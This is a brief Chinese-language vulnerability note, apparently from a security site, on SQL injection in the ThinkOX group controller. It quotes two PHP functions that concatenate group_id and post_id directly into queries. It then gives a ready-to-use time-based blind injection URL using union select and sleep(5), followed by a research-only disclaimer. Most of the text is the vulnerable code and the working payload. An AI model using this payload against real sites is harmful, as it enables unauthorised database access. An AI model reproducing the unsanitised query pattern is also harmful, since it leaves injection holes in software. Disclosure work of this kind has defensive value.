/Application/Group/Controller/GroupController.class.php
protected function getNotice($group_id) { $notice = D('GroupNotice')->where('group_id=' . $group_id)->find(); $this->assign('notice', $notice); return $notice; } protected function getGroupIdByPost($post_id) { $post = D('GroupPost')->where('id=' . $post_id)->find(); return $post['group_id']; }
这两处都是直接拼接的,导致调用这两处函数的地方存在注入。因为返回的只是group id,所以只能盲注。
Payload:
http://0day5.com/thinkox/index.php?s=/group/index/recommend/post_id/-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,sleep(5)%23.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论